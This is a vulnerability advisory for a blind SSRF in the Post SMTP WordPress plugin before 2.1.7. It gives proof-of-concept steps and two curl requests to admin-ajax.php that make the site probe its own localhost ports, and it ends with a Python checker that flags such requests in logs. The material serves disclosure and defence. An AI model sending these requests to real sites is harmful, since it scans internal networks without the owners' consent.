Type: wpexploit
Reporter: Raad Haddad of Cloudyrion GmbH
WPEX-ID: DC99AC40-646A-4F8E-B2B9-DC55D6D4C55C
Date: Sep 05, 2022 - 12:00 a.m.

Post SMTP < 2.1.7 - Admin+ Blind SSRF


EPSS: 0.001 (Low), percentile 43.1%

The plugin does not perform proper authorisation in some AJAX actions, which could allow high-privilege users such as admins to perform blind SSRF, for example on multisite installations.

# Navigate to https://example.com/wp-admin/admin.php?page=postman%2Fport_test

# In the "Outgoing Mail Server Hostname" parameter, fill in the target host and port number

localhost:44

# If the results take too much time to return, this means that the port is open

--- curl requests ---

curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php?_fs_blog_admin=true' -X POST -H 'Cookie: WP COOKIES' --data 'action=postman_test_smtps&hostname=localhost%3A44&port=465&security=6b297e1647'
curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php?_fs_blog_admin=true' -X POST -H 'Cookie: WP COOKIES' --data 'action=postman_test_port&hostname=localhost%3A1338&port=25&security=6b297e1647'
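A defender-side check for the requests shown above, as an added example that is not part of the original advisory or the plugin's code: it reviews captured admin-ajax.php POST bodies for the two port-test actions and flags internal targets or a port embedded in the hostname field. It assumes a proxy or WAF that logs form bodies; the function names and the sample bodies are constructed for illustration.

```python
import ipaddress
from urllib.parse import parse_qs

# AJAX actions named in the curl requests above.
PORT_TEST_ACTIONS = {"postman_test_port", "postman_test_smtps"}
INTERNAL_NAMES = {"localhost"}  # assumption: extend with your internal DNS names

def split_host(value):
    """Split the hostname parameter into (host, embedded_port or None)."""
    value = value.strip()
    if value.startswith("["):  # bracketed IPv6 such as [::1]:44
        host, _, rest = value[1:].partition("]")
        return host, rest.lstrip(":") or None
    if value.count(":") == 1:  # name:port or IPv4:port
        host, port = value.split(":")
        return host, port or None
    return value, None  # bare name, IPv4 or unbracketed IPv6

def is_internal(host):
    """True for localhost and for loopback, private, link-local or reserved IPs."""
    if host.lower().rstrip(".") in INTERNAL_NAMES:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # other names are not resolved here (no DNS lookups)
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved

def review_body(body):
    """Return a list of findings for one admin-ajax.php POST body."""
    form = {k: v[0] for k, v in parse_qs(body).items()}
    if form.get("action") not in PORT_TEST_ACTIONS:
        return []
    host, embedded_port = split_host(form.get("hostname", ""))
    findings = []
    if embedded_port is not None:
        findings.append(f"port {embedded_port} embedded in hostname (port field says {form.get('port')})")
    if is_internal(host):
        findings.append(f"internal target {host}")
    return findings

# Constructed sample bodies; the first mirrors a curl request above.
SAMPLES = [
    "action=postman_test_smtps&hostname=localhost%3A44&port=465&security=6b297e1647",
    "action=postman_test_port&hostname=%5B%3A%3A1%5D%3A25&port=25&security=constructed",
    "action=postman_test_port&hostname=smtp.example.com&port=587&security=constructed",
]
```

Hostnames that resolve to internal addresses through DNS are not caught by this check; resolving them before classification is the natural extension.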
